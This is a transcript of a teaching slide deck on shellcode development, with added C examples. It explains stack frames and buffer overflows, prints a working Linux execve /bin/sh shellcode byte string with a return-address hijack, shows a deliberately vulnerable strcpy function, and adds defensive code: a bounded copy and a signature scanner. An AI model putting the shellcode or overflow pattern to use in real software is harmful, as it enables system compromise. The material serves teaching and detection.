Shellcode Development - Femi Oloyede - Pallavi Murudkar
TRANSCRIPT
Page 1
Shellcode Development
-Femi Oloyede
-Pallavi Murudkar
Page 2
Agenda
Introduction
What can Shellcode do?
Tools for Shellcode Development
Understanding Shellcode
Developing Shellcode
Methods of Detecting Shellcode
Page 3
Introduction
Shellcode is defined as a set of instructions injected and then executed by an exploited program.
Shellcodes are primarily used to exploit buffer overflows.
The most important task when creating shellcode is to make it small and executable.
Page 4
What can Shellcode do?
Providing access to the attacked system
Spawning /bin/sh [or] cmd.exe (local shell)
Binding a shell to a port (remote shell)
Adding root/admin user to the system
Chmod()’ing /etc/shadow to be writeable
Page 5
Tools for Shellcode development
Nasm: used to write assembly code
Gdb: GNU debugger, used to analyze core dump files
Objdump: used to disassemble a file
Ktrace: traces all system calls a process is using
Page 6
Next (Femi)
Understanding Shellcode
Developing Shellcode
Methods of Detecting Shellcode
Page 7
Understanding Shellcode
IA-32 Machine Architecture (instruction set & registers)
Program flow dynamics: process memory organization, and context switching during function calls and interrupt processing.
Shellcode is injected via the modification of the return address of a function by way of a stack-based buffer overflow.
Page 8
Machine Architecture
Refer to "IA-32 Intel® Architecture Software Developer's Manual, Volume 1: Basic Architecture".
A large amount of computer software supports the platform, including operating systems such as MS-DOS, Windows, Linux, BSD, Solaris, and Mac OS X.
EBP Base pointer. Primarily used to hold the address of the current stack frame. Also sometimes used as a general data or address register.
ESI General register or "source index" for string operations. Also has a one-byte LODS[size] instruction for loading data from memory to the accumulator.
EDI General register or "destination index" for string operations. Also has a one-byte STOS[size] instruction to write data out of the accumulator.
ESP Stack pointer. Is used to hold the top address of the stack.
EIP Instruction pointer. Holds the current instruction address.
Page 9
Program Flow Dynamics
[Figure: process memory layout, from lower to higher memory address: Text Area; Initialized and Un-initialized Data Area; Stack]

C code:

    void A(int a, int b, int c) {
        char buffer1[5];
        char buffer2[10];
    }

    int main(void) {
        A(1, 2, 3);
        return 0;
    }

Assembly Code (the caller pushes the arguments right to left and calls A; A's prologue saves the old frame pointer and reserves 20 bytes for the two buffers, rounded up to word boundaries):

    pushl $3
    pushl $2
    pushl $1
    call A
    pushl %ebp
    movl %esp,%ebp
    subl $20,%esp
Page 10
Program Flow Dynamics (cont)
[Figure: stack frame of A() after the prologue, from the top of the stack (lower addresses) to the bottom (higher addresses): Buffer2 (12 bytes), Buffer1 (8 bytes), SFP (4), RET (4), a (4), b (4), c (4)]
EBP (base or frame pointer) [movl %esp, %ebp]: points at the SFP slot, which holds the address of the previous frame pointer [pushl %ebp]
RET: address of the ‘return 0’ instruction of main
ESP (stack pointer) [subl $20, %esp]: points at the top of the stack
EIP (instruction pointer): address of the last instruction in A
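The frame the diagram above describes can be inspected from inside a running function. The following is an added example written for this transcript, not code from the slides: it uses the GCC/Clang builtins __builtin_frame_address and __builtin_return_address (which make the compiler keep a frame pointer for that function) to locate the local buffer, the SFP slot and the RET slot, and to compute how many bytes an overflow of the buffer must write before it reaches RET. The names inspect_frame, frame_layout and bytes_to_return_address are hypothetical; on a 64-bit build the slots are 8 bytes wide rather than the 4 shown on the IA-32 slides.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Where a local buffer sits relative to the frame pointer (SFP slot) and the
   saved return address (RET slot) in the current function's frame.
   Hypothetical type name for this added example. */
struct frame_layout {
    uintptr_t buffer_addr;   /* lowest address of the local char array */
    uintptr_t frame_addr;    /* EBP/RBP value: the slot holding the saved frame pointer */
    uintptr_t ret_slot_addr; /* the slot just above SFP, holding the return address */
    int ret_slot_matches;    /* 1 if the word in that slot is the real return address */
};

/* Must not be inlined: the layout only exists if the function has its own frame. */
__attribute__((noinline)) struct frame_layout inspect_frame(void) {
    char buffer[16];
    struct frame_layout fl;
    void *fp = __builtin_frame_address(0);   /* forces a frame pointer here */
    void *ra = __builtin_return_address(0);

    /* Touch the buffer so the compiler must keep it on the stack. */
    buffer[0] = 'A';
    buffer[15] = buffer[0];

    fl.buffer_addr   = (uintptr_t)buffer;
    fl.frame_addr    = (uintptr_t)fp;
    fl.ret_slot_addr = (uintptr_t)fp + sizeof(void *);
    fl.ret_slot_matches = (*(void **)fl.ret_slot_addr == ra);
    return fl;
}

/* Bytes between the start of the buffer and the RET slot: the buffer itself,
   any padding or other locals, then SFP. */
size_t bytes_to_return_address(const struct frame_layout *fl) {
    return (size_t)(fl->ret_slot_addr - fl->buffer_addr);
}

/* Sanity check of the layout the slides describe: locals live below the frame
   pointer, RET sits one word above it, and at least buffer + SFP separate them. */
int frame_layout_is_sane(void) {
    struct frame_layout fl = inspect_frame();
    return fl.buffer_addr < fl.frame_addr
        && fl.ret_slot_matches
        && bytes_to_return_address(&fl) >= 16 + sizeof(void *);
}

int main(void) {
    struct frame_layout fl = inspect_frame();
    printf("buffer   @ %#lx\n", (unsigned long)fl.buffer_addr);
    printf("SFP slot @ %#lx\n", (unsigned long)fl.frame_addr);
    printf("RET slot @ %#lx (holds the real return address: %d)\n",
           (unsigned long)fl.ret_slot_addr, fl.ret_slot_matches);
    printf("bytes from buffer start to RET: %zu\n", bytes_to_return_address(&fl));
    return 0;
}
```

The distance printed last is the number of bytes a copy into buffer can write before it changes where inspect_frame returns; with a stack protector enabled the canary sits inside that gap, which is why it catches a linear overwrite before the ret instruction runs.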
Page 11
Stack Based Buffer Overflow

    #include <string.h>

    void A(char *str) {
        char buffer[4];
        strcpy(buffer, str);
    }

    int main(void) {
        char BiggerString[12] = "AAAAAAAAAAAA";
        A(BiggerString);
        return 0;
    }

[Figure: A()'s stack frame, top of stack to bottom: Buffer1 (4), SFP (4), RET (4), charPtr (4). The twelve ‘A’ bytes fill the 4-byte buffer and run over SFP and RET]
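The added example below, which is not from the slides, places the deck's strcpy() version of A() beside a bounded replacement that refuses input it cannot hold. A_vulnerable is kept only for comparison and is never called; A_hardened returns the number of bytes stored, or -1 when the argument would have run past the buffer into SFP and RET. The function names and the sample strings are constructed for this example.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 4

/* The slide's function as written: strcpy() copies until the source's NUL and
   knows nothing about the 4-byte destination, so a 12-byte argument overwrites
   SFP and RET. Kept for comparison only; never called. */
void A_vulnerable(const char *str) {
    char buffer[BUF_SIZE];
    strcpy(buffer, str);
}

/* Bounded copy: never writes more than dst_size bytes (including the NUL) and
   tells the caller whether src fit. Returns 0 on success, -1 on overflow. */
int copy_bounded(char *dst, size_t dst_size, const char *src) {
    size_t n = 0;
    while (n < dst_size && src[n] != '\0')   /* scan no further than the room we have */
        n++;
    if (n == dst_size)                        /* src is too long, or no room for NUL */
        return -1;
    memcpy(dst, src, n + 1);                  /* n bytes plus the terminator */
    return 0;
}

/* Same role as A(): stores the string in a 4-byte local, but rejects oversize
   input instead of corrupting the frame. Returns bytes stored, or -1. */
int A_hardened(const char *str) {
    char buffer[BUF_SIZE];
    if (copy_bounded(buffer, sizeof buffer, str) != 0)
        return -1;
    return (int)strlen(buffer);
}

int main(void) {
    const char *small = "abc";                  /* constructed: 3 bytes + NUL fit */
    const char *bigger_string = "AAAAAAAAAAAA"; /* constructed: the slide's 12 'A's */
    printf("A_hardened(\"%s\") = %d\n", small, A_hardened(small));
    printf("A_hardened(\"%s\") = %d\n", bigger_string, A_hardened(bigger_string));
    return 0;
}
```

The check is on the destination size, not the source length: copy_bounded never reads more than dst_size bytes of src either, so an unterminated source (as the slide's 12-byte array without a NUL would be) cannot make it run off the end.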
Page 12
Developing Shellcode
Finding the Vulnerability
Writing the Shellcode
Shellcode is a sequence of machine instructions (opcodes).
To take advantage of the injected code and gain access to the target system, system calls must be used.
On Linux there are two ways of invoking a system call: the lcall7/lcall27 call gates and the ‘INT 0x80’ software interrupt.
Page 13
Example – Spawning a Shell
Write C code
Extract the assembly code
Extract the opcode
Append function-exit opcodes to allow the function to exit gracefully
Initialize a buffer with the opcode

    #include <stdio.h>
    #include <unistd.h>   /* execve() */

    int main(void) {
        char *name[2];
        name[0] = "/bin/sh";
        name[1] = NULL;
        execve(name[0], name, NULL);
        return 0;
    }
Page 14
Example – Spawning a Shell (cont.)

    char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

    int main(void) {
        int *retPtr;
        retPtr = (int *)&retPtr + 2;   /* address of retPtr + 2 words = the RET slot */
        (*retPtr) = (int)shellcode;    /* RET now holds the address of the shellcode buffer */
        return 0;
    }

[Figure: main()'s stack frame, top of stack to bottom: retPtr (4), SFP (4), RET (4). retPtr holds the address of this + 2 words, i.e. the RET slot, which is overwritten with the address of the shellcode buffer]
Page 15
Methods for Detecting Shellcode
NIDS (Network Intrusion Detection System) can be used to identify shellcode on the wire using Signature databases and Protocol analysis methods
IPS (Intrusion Prevention System) identifies shellcode by running the code on a sandbox/virtualization in order to detect if the given code is malicious or not
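As an added example of the signature approach, not part of the slides: a small scanner that applies three indicators a NIDS signature for this kind of payload would carry, a long run of 0x90 NOP bytes, the int 0x80 opcode pair cd 80, and the literal /bin/sh. The two sample payloads are constructed here; scan_for_shellcode and the SC_* flags are hypothetical names, and a real signature database combines many more such patterns with protocol context to keep false positives down.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Indicator flags returned by scan_for_shellcode() (hypothetical names). */
#define SC_NOP_SLED   0x1u  /* run of at least NOP_SLED_MIN 0x90 bytes */
#define SC_INT80      0x2u  /* the 'cd 80' (int 0x80) opcode pair */
#define SC_SHELL_PATH 0x4u  /* the literal string "/bin/sh" */

#define NOP_SLED_MIN 16

/* 1 if needle (nlen bytes) occurs anywhere in hay (hlen bytes).
   memmem() is not portable, so the search is written out. */
static int contains_bytes(const unsigned char *hay, size_t hlen,
                          const unsigned char *needle, size_t nlen) {
    if (nlen == 0 || hlen < nlen) return 0;
    for (size_t i = 0; i + nlen <= hlen; i++)
        if (memcmp(hay + i, needle, nlen) == 0) return 1;
    return 0;
}

/* Longest run of consecutive 0x90 bytes in the payload. */
static size_t longest_nop_run(const unsigned char *buf, size_t len) {
    size_t best = 0, run = 0;
    for (size_t i = 0; i < len; i++) {
        run = (buf[i] == 0x90) ? run + 1 : 0;
        if (run > best) best = run;
    }
    return best;
}

/* Bitmask of the SC_* indicators present in buf; 0 means nothing fired. */
unsigned scan_for_shellcode(const unsigned char *buf, size_t len) {
    static const unsigned char int80[]  = { 0xcd, 0x80 };
    static const unsigned char shpath[] = "/bin/sh";   /* 7 bytes, NUL excluded below */
    unsigned flags = 0;
    if (longest_nop_run(buf, len) >= NOP_SLED_MIN)         flags |= SC_NOP_SLED;
    if (contains_bytes(buf, len, int80, sizeof int80))     flags |= SC_INT80;
    if (contains_bytes(buf, len, shpath, sizeof shpath - 1)) flags |= SC_SHELL_PATH;
    return flags;
}

/* Constructed sample: a 32-byte NOP sled, then an int 0x80 sequence and the
   "/bin/sh" string, as the slide's payload would look on the wire. */
unsigned scan_suspicious_sample(void) {
    unsigned char payload[64];
    memset(payload, 0x90, 32);
    memcpy(payload + 32, "\x31\xc0\xb0\x0b\xcd\x80/bin/sh", 13);
    return scan_for_shellcode(payload, 32 + 13);
}

/* Constructed sample: an ordinary HTTP request that should not match. */
unsigned scan_benign_sample(void) {
    const char *req = "GET /index.html HTTP/1.1\r\nHost: example.test\r\n\r\n";
    return scan_for_shellcode((const unsigned char *)req, strlen(req));
}

int main(void) {
    printf("suspicious sample flags: 0x%x\n", scan_suspicious_sample());
    printf("benign sample flags:     0x%x\n", scan_benign_sample());
    return 0;
}
```

Each indicator on its own is weak (0x90 runs occur in padding, "/bin/sh" appears in legitimate scripts), which is why the scanner reports a bitmask rather than a verdict; a signature rule would require several indicators together, inside a specific protocol field, before raising an alert.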
Page 16
Conclusion
Shellcode is a powerful mechanism for the exploitation of software vulnerabilities.
It is important that the shellcode developed is small in size
Shellcode can be employed to automate software security tests, where the shellcode is written to expose and draw attention to security holes
Page 17
Questions?